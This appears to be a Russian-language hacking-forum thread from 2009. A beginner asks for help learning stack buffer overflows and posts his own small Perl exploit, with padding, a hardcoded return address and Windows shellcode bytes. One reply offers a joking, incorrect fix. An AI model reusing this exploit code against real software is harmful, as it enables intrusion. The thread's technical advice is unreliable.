Переполнения буфера!!!

Discussion in 'Реверсинг' started by wofan, 11 Nov 2009.

  1. wofan

    wofan Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    кинте сылку на видео уроки по Переполнения буфера. :(
     
  2. razb

    razb Active Member

    Joined:
    24 Mar 2009
    Messages:
    658
    Likes Received:
    133
    Reputations:
    18
    какие видеоуроки, статей и так выше крыши
     
    1 person likes this.
  3. swt1

    swt1 Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    306
    Likes Received:
    78
    Reputations:
    21
    _wikipedia.org/wiki/Переполнение_буфера
    так же на wasm.ru есть статьи...
    юзайте поиск...
    _wasm.ru/article.php?article=1020001
     
    #3 swt1, 11 Nov 2009
    Last edited: 11 Nov 2009
  4. wofan

    wofan Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    там только теория
     
  5. swt1

    swt1 Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    306
    Likes Received:
    78
    Reputations:
    21
    Если вы знакомы с теорией,тогда в чём проблема?остаётся только практика,либо вы просто лентяй.
     
    3 people like this.
  6. wofan

    wofan Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    в том то й проблема что ето только теория а кат ето использовать,написать сплоит?
    поиоему там об етом ничево нету.
     
  7. swt1

    swt1 Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    306
    Likes Received:
    78
    Reputations:
    21
    _wasm.ru/article.php?article=buf_over4noob...
     
  8. wofan

    wofan Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    здесь всьо про Unix системы,а про винду есть?
     
  9. Psi.X

    Psi.X New Member

    Joined:
    12 Apr 2009
    Messages:
    29
    Likes Received:
    3
    Reputations:
    0
    Крис Касперски об этом не одну книгу написал, just use google =)
     
  10. wofan

    wofan Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    там ничево нету.
     
  11. wofan

    wofan Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    сенкс понял только никак незапущу шелкод на исполнения.
    получается вот такая хрень вбиваю 28 букв затем адрес возврата.
    в Olly видна как оно переходит на адрес возврата.
    затем питаюсь вбить експлоит после адреса возврата но он затрагивает адрес возврата.што делать непойму.
     
  12. gold-goblin

    gold-goblin Elder - Старейшина

    Joined:
    26 Mar 2007
    Messages:
    917
    Likes Received:
    174
    Reputations:
    3
    лучше тему в реверсинг.
    эксплойт никуда не надо вбивать... надо шел код вбивать.
     
  13. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    ТС, вот для кого грейт старался, писал статью, все разъяснял, с примерами, а?
    Неужели так трудно заюзать поиск по форуму?

    http://forum.antichat.ru/thread26791.html
     
    1 person likes this.
  14. wofan

    wofan Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    разобрался только неможу вбить правельний адрес возврата.
    вбиваю "\x40\xfb\x22\x00" а оно вместо первих нулей пишет 20.
    што делать подскажите.
     
  15. wofan

    wofan Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    Ладно обясню по подробней.
    есть мой exploit на Perl:
    #!perl
    $Poc = "\x61" x28;
    $returnadr = "\x40\xfb\x22\x00";
    $shellcode = "\x33\xC0\xB8\x8F".
    "\x7A\x83\x7C\x68".
    "\x00\x04\x00\x00".
    "\x68\x00\x03\x00".
    "\x00\xFF\xD0\x33".
    "\xC0\xB8\xFA\xCA".
    "\x81\x7C\xFF\xD0";
    print "$Poc$returnadr$shellcode";.
    загвоздка в том што строка "\x40\xfb\x22\x00" должна давать адрес возврата 0022fb40,а она почемуто вместо етаво дайот 2022fb40.
    тоесть "\x00" принимаетса за 20 ходя должно приниматса за 00.
     
  16. Lazy_Student

    Lazy_Student Banned

    Joined:
    14 Nov 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    -10
    смини в стрроке \x40\xfb\x22\x00 на \x40\xfb\x22\x20 и все будит ok

    зы: сначала прочол тему как у мня "переполнение мочевого пузыря" г г г
     
  17. wofan

    wofan Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    33
    Likes Received:
    1
    Reputations:
    0
    тоже сомое.